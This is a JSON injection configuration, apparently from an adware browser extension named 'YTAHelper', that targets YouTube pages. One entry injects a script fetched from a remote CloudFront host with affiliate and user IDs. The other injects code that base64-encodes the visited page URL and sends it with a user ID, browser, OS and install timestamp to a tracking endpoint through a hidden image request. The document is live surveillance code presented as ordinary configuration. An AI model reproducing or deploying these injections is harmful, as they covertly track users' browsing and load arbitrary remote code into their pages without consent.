{
    "Ver": "1.0.0.1",
    "Injections": [
		{
			"NAME": "YTA",
			"MATCHEXP": [
                "https?://[\\w\\.]*?youtube\\.com.*"
            ],
			"HEAD": {
				"scripttext": ["(function(){var n=document.createElement('script'),t,i;n.src='//dbt8966nib5tv.cloudfront.net/player/ytinjsrc.ashx?app=YTAHelper&aff=%%AFF%%&pg=%%PIXGUID%%&v=%%VERSION%%&bn=%%BROWSERNAME%%&bv=%%BROWSERVER%%';n.type='text/javascript';n.async=!0;t=document.getElementsByTagName('head');i=document.getElementsByTagName('body');t.length>0?t[0].appendChild(n):i.length>0&&i[0].appendChild(n)})();"]
			}				
		},
		{
			"NAME": "GoobzoInfo",
			"MATCHEXP": [
                "https?://[\\w\\.]*?youtube\\.com.*"
            ],
			"HEAD": {
               "scripttext": ["(function() {var GoobIsInFrame = (window.location != window.parent.location); if(GoobIsInFrame) return; var Base64 = {_keyStr : 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=', encode : function (input) { var output = ''; var chr1, chr2, chr3, enc1, enc2, enc3, enc4; var i = 0; input = Base64._utf8_encode(input);while (i < input.length) {chr1 = input.charCodeAt(i++); chr2 = input.charCodeAt(i++); chr3 = input.charCodeAt(i++); enc1 = chr1 >> 2; enc2 = ((chr1 & 3) << 4) | (chr2 >> 4); enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);enc4 = chr3 & 63;if (isNaN(chr2)) {enc3 = enc4 = 64;} else if (isNaN(chr3)) {enc4 = 64;}output = output +Base64._keyStr.charAt(enc1) + Base64._keyStr.charAt(enc2) + Base64._keyStr.charAt(enc3) + Base64._keyStr.charAt(enc4);}return output;},_utf8_encode : function (string) {var utftext = '';for (var n = 0; n < string.length; n++) {var c = string.charCodeAt(n);if (c < 128) {utftext += String.fromCharCode(c);}else if((c > 127) && (c < 2048)) { utftext += String.fromCharCode((c >> 6) | 192);utftext += String.fromCharCode((c & 63) | 128);} else {utftext += String.fromCharCode((c >> 12) | 224);utftext += String.fromCharCode(((c >> 6) & 63) | 128);utftext += String.fromCharCode((c & 63) | 128);}}return utftext;}};if (!window.btoa)window.btoa = Base64.encode;var installDate = Math.round(new Date().getTime()/1000); var browserName ='%%BROWSERNAME%%' ;var browserVer = '%%BROWSERVER%%';var os =  navigator.platform;var EncodedUrl = window.btoa(document.URL);var userID = '%%PIXGUID%%';var shpro_url = '//d22p2jhoymd2lo.cloudfront.net/app/t.ashx?';shpro_url += 'uid=' + userID;shpro_url += '&bn=' + browserName;shpro_url += '&bv=' + browserVer;shpro_url += '&shpro_url=' + EncodedUrl;shpro_url += '&prd=YTAHelper';shpro_url += '&os=' + os;shpro_url += '&id=' + installDate;shpro_url += '&aff=' + '%%AFF%%';shpro_url += '&ver=' + '%%VERSION%%';var Element = document.createElement('img');Element.setAttribute('type','text/javascript');Element.src = shpro_url;document.head.appendChild(Element);})();"]             
            }
		}
	]
}